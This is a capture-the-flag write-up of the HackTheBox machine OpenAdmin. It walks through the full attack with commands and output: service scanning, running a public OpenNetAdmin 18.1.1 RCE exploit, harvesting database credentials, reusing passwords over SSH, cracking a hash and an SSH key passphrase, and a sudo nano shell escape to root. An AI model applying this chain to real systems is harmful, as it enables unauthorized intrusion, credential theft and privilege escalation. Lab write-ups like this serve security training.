OpenAdmin from HackTheBox

OpenAdmin from HackTheBox

OpenAdmin is an easy difficulty Linux machine that features an outdated OpenNetAdmin CMS instance. The CMS is exploited to gain a foothold, and subsequent enumeration reveals database credentials. These credentials are reused to move laterally to a low privileged user. This user is found to have access to a restricted internal application. Examination of this application reveals credentials that are used to move laterally to a second user. A sudo misconfiguration is then exploited to gain a root shell.

Nmap scan

We start by checking the running services:

nmap -sV -sC 10.10.10.171 -v
22/tcp open  ssh     OpenSSH 7.6p1 Ubuntu 4ubuntu0.3 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey: 
|   2048 4b:98:df:85:d1:7e:f0:3d:da:48:cd:bc:92:00:b7:54 (RSA)
|   256 dc:eb:3d:c9:44:d1:18:b1:22:b4:cf:de:bd:6c:7a:54 (ECDSA)
|_  256 dc:ad:ca:3c:11:31:5b:6f:e6:a4:89:34:7c:9b:e5:50 (ED25519)
80/tcp open  http    Apache httpd 2.4.29 ((Ubuntu))
| http-methods: 
|_  Supported Methods: HEAD GET POST OPTIONS
|_http-server-header: Apache/2.4.29 (Ubuntu)
|_http-title: Apache2 Ubuntu Default Page: It works
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

We have an ssh and a web port open.

http://10.10.10.171 is just returning the default apache web page

Web enumeration

To find the sub-directories , I like to use gobuster

gobuster dir -u http://10.10.10.171 -w /usr/share/wordlists/dirb/common.txt
/artwork (Status: 301)
/index.html (Status: 200)
/music (Status: 301)
/server-status (Status: 403)

After checking the login page at http://10.10.10.171/music , I've found an interesting service version

The version is v18.1.1

By checking the page source:

<head>
    <title>OpenNetAdmin :: 0wn Your Network</title>
    <meta http-equiv="Content-Type" content="text/html; charset=utf-8">
    <link rel="stylesheet" type="text/css" href="/ona/include/html_style_sheet.inc.php">
    <link rel="shortcut icon" type="image/ico" href="/ona/images/favicon.ico">
    <script type="text/javascript" src="/ona/include/js/global.js" language="javascript"></script>
    <script type="text/javascript" src="/ona/include/xajax_drag/drag.js"></script>
<script type="text/javascript" src="/ona/include/xajax_suggest/suggest.js"></script>

The title is OpenNetAdmin. We can use searchsploit to search for an exploit for the version

searchsploit opennetadmin
OpenNetAdmin 13.03.01 - Remote Code Execution                                                                                                        | exploits/php/webapps/26682.txt
OpenNetAdmin 18.1.1 - Command Injection Exploit (Metasploit)                                                                                         | exploits/php/webapps/47772.rb
OpenNetAdmin 18.1.1 - Remote Code Execution     

We have an RCE!

First shell

We can grab the exploit:

searchsploit -m exploits/php/webapps/47691.sh && chmod +x 47691.sh

then we execute it against the vulnerable endpoint

./47691.sh http://10.10.10.171/ona/login.php

We have a first shell!

Finding ssh creds

After spending some time searching for a clue, I've decided to take a look at the web root directory /var/www/html/ona/local/config/ and found an interesting php file called database_settings.inc.php which has a password n1nj4W4rri0R!

<?php

$ona_contexts=array (
  'DEFAULT' => 
  array (
    'databases' => 
    array (
      0 => 
      array (
        'db_type' => 'mysqli',
        'db_host' => 'localhost',
        'db_login' => 'ona_sys',
        'db_passwd' => 'n1nj4W4rri0R!',
        'db_database' => 'ona_default',
        'db_debug' => false,
      ),
    ),
    'description' => 'Default data context',
    'context_color' => '#D3DBFF',
  ),
);

Now we need a valid user. In Linux, we can find the usernames in /home or by checking the /etc/passwd

$ ls /home
jimmy
joanna

I've tried to ssh with both users and the password worked for the jimmy user!

Owning User

By checking the running services using netstat -antp ,we can see few services running locally

To be able to access them, we have to do a port forwarding , the easiest way here is using ssh.

ssh -L 52846:localhost:52846 [email protected]

First , I've tried curl http://127.0.0.1:52846 and seemed to be a login page. We can access it from the browser to see the actual page.

At this point , we can check the DocumentRoot for this page, maybe we can find login creds in the files.
To do so, we need to check the apache config files

ls -l /etc/apache2/sites-available/
total 16
-rw-r--r-- 1 root root 6338 Jul 16  2019 default-ssl.conf
-rw-r--r-- 1 root root  303 Nov 23 17:13 internal.conf
-rw-r--r-- 1 root root 1329 Nov 22 14:24 openadmin.conf

The openadmin.conf is for the default apache web root,but internal.conf has:

Listen 127.0.0.1:52846

<VirtualHost 127.0.0.1:52846>
    ServerName internal.openadmin.htb
    DocumentRoot /var/www/internal

<IfModule mpm_itk_module>
AssignUserID joanna joanna
</IfModule>

    ErrorLog ${APACHE_LOG_DIR}/error.log
    CustomLog ${APACHE_LOG_DIR}/access.log combined

</VirtualHost>

The index.php in the /var/www/internal dir has a password:

if ($_POST['username'] == 'jimmy' && hash('sha512',$_POST['password']) == '00e302ccdcf1c60b8ad50ea50cf72b939705f49f40f0dc658801b4680b7d758eebdc2e9f9ba8ba3ef8a8bb9a796d34ba2e856838ee9bdde852b8ec3b3a0523b1') {

Cracking this password with crackstation : https://crackstation.net/ gives me Revealed as password.
A private id_rsa key appears after web login. We can crack it with john. Save the id rsa in a file called id_rsa then convert it to john format:

/opt/sshng2john.py id_rsa > to_crack
john to_crack -w=/usr/share/wordlists/rockyou.txt

The password is bloodninjas
Now we can ssh using joanna with this id_rsa and the cracked password

Owning root

First thing to do is to check if we can run commands as root without password

sudo -l
joanna@openadmin:~$ sudo -l
Matching Defaults entries for joanna on openadmin:
    env_reset, mail_badpass, secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin\:/snap/bin

User joanna may run the following commands on openadmin:
    (ALL) NOPASSWD: /bin/nano /opt/priv

We can run /bin/nano /opt/priv as all users without password.
Gtfobins nano: https://gtfobins.github.io/gtfobins/nano/
Commands:

sudo -u root /bin/nano /opt/priv

press: ctrl+R ctrl+X then type: reset; sh 1>&0 2>&0 and press enter

Box owned! Your feedback is appreciated :)